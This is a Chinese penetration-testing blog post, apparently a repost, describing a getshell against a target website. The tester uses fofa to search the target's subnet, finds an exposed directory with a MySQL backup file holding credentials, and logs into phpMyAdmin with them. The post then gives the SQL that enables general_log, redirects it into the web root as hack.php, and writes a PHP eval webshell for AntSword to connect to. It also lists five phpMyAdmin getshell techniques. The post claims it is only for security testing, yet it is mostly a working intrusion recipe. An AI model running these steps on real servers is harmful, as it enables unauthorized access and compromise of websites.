【渗透实战系列】|17-巧用fofa对目标网站进行getshell

admin 2021年8月8日02:49:46评论452 views字数 891阅读2分58秒阅读模式

涉及知识点:

信息搜集目标网站IP利用fofa对目标ip的c段进行搜索发现数据库备份文件和管理界面登录数据库页面,进行写马写马成功,获取webshell

声明:本文仅用于安全测试。


1、目标测试网站地址aa.bb.com

通过信息搜集获取到,该网站地址为ipw为x.x.x.x

2、fofa对目标地址C段进扫描

fofa输入关键字ip=“x.x.x.0/24”进行搜索,意外发现c段开着8090端口的地址


【渗透实战系列】|17-巧用fofa对目标网站进行getshell


   3、打开http://x.x.x.x:8090发现遍历文件目录,且意外发现数据库备份软件和mysql管理页面                    


【渗透实战系列】|17-巧用fofa对目标网站进行getshell

打开数据库备份文件mysqlbackup.bat发现账户和密码

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

打开mysql管理页面

http://x.x.x.x/MySQL/ 发现为phpMyAdmin管理页面,利用备份文件获取的账户和密码顺利登录

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

4、phpMyAdmin写马

phpmyadmin后台getshell的常用手段有以下几种方式:

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell


执行以下sql语句

 show variables like '%secure%';

【渗透实战系列】|17-巧用fofa对目标网站进行getshell


发现没有写入权限,无法用select into outfile方法写入shell。我们再来看一下第二种方法,利用全局变量general_log去getshell

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

我们将全局日志开启并将保存日志的目录设为web目录

 set global general_log=on;# 开启日志  set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 设置日志位置为网站目录

设置成功

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

此时执行如下语句即可写入webshell到hack.php中

 select '<?php eval($_POST[whoami]); ?>'

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

用蚁剑连接即可

【渗透实战系列】|17-巧用fofa对目标网站进行getshell


本文始发于微信公众号(Hacking黑白红):【渗透实战系列】|17-巧用fofa对目标网站进行getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月8日02:49:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透实战系列】|17-巧用fofa对目标网站进行getshellhttp://cn-sec.com/archives/422077.html

发表评论

匿名网友 填写信息